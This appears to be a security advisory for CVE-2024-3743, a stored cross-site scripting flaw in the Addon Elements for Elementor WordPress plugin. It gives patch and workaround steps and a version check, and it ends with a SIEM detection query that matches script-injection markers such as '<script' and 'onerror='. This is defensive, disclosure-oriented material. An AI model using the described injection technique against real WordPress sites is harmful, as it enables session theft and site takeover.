CVE-2024-3743
📋 TL;DR
The Elementor Addon Elements WordPress plugin has a stored cross-site scripting vulnerability that allows authenticated attackers with contributor-level access or higher to inject malicious scripts into web pages. These scripts execute whenever users visit the compromised pages, potentially stealing credentials or performing unauthorized actions. All WordPress sites using this plugin up to version 1.13.3 are affected.
💻 Affected Systems
- Elementor Addon Elements WordPress Plugin
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, hijack user sessions, redirect visitors to malicious sites, or perform actions on behalf of authenticated users, potentially leading to complete site compromise.
Likely Case
Attackers with contributor access inject malicious scripts that steal user cookies/sessions or display phishing content to visitors, leading to account compromise and data theft.
If Mitigated
With proper user role management and content review processes, the impact is limited to potential defacement or minor data exposure from lower-privileged accounts.
🎯 Exploit Status
Exploitation requires authenticated access (contributor role or higher). The vulnerability is in multiple widgets, making exploitation straightforward once authenticated.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.13.4 or later
Vendor Advisory: https://wordpress.org/plugins/addon-elements-for-elementor-page-builder/#developers
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find 'Addon Elements for Elementor'. 4. Click 'Update Now' if available. 5. Alternatively, download version 1.13.4+ from WordPress.org and manually update.
🔧 Temporary Workarounds
Temporary Widget Disable
allDisable the vulnerable widgets (Image Stack Group, Shape Separator, Content Switcher, Info Circle, Timeline) via Elementor settings or code.
Add to theme's functions.php: add_filter('elementor/widgets/register', function($widgets_manager) { $widgets_manager->unregister_widget_type('addon-elements-image-stack'); $widgets_manager->unregister_widget_type('addon-elements-shape-separator'); $widgets_manager->unregister_widget_type('addon-elements-content-switcher'); $widgets_manager->unregister_widget_type('addon-elements-info-circle'); $widgets_manager->unregister_widget_type('addon-elements-timeline'); });
🧯 If You Can't Patch
- Restrict user roles: Remove contributor access or implement strict role-based access control
- Implement web application firewall (WAF) rules to block XSS payloads in widget parameters
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins for 'Addon Elements for Elementor' version. If version is 1.13.3 or lower, you are vulnerable.Check Version:
wp plugin list --name='addon-elements-for-elementor-page-builder' --field=versionVerify Fix Applied:
After updating, verify the plugin version shows 1.13.4 or higher in WordPress admin panel.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to widget endpoints with script tags or JavaScript payloads
- Multiple content updates from contributor-level accounts
Network Indicators:
- Inbound requests containing script tags or JavaScript in widget parameter names/values
SIEM Query:
source="wordpress.log" AND ("addon-elements" OR "widget") AND ("<script" OR "javascript:" OR "onerror=" OR "onload=")🔗 References
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/bg-slider/module.php#L269
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/content-switcher/skins/skin-3.php#L43
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/info-circle/skins/skin-base.php#L154
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/shape-separator/shapes/triangle-bottom-right.php#L1
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/timeline/skins/skin-base.php#L1363
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3078419%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3077362%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/f36fea15-0475-45ee-b913-790db6373aef?source=cve
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/bg-slider/module.php#L269
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/content-switcher/skins/skin-3.php#L43
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/info-circle/skins/skin-base.php#L154
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/shape-separator/shapes/triangle-bottom-right.php#L1
- https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/timeline/skins/skin-base.php#L1363
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3078419%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3077362%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/f36fea15-0475-45ee-b913-790db6373aef?source=cve
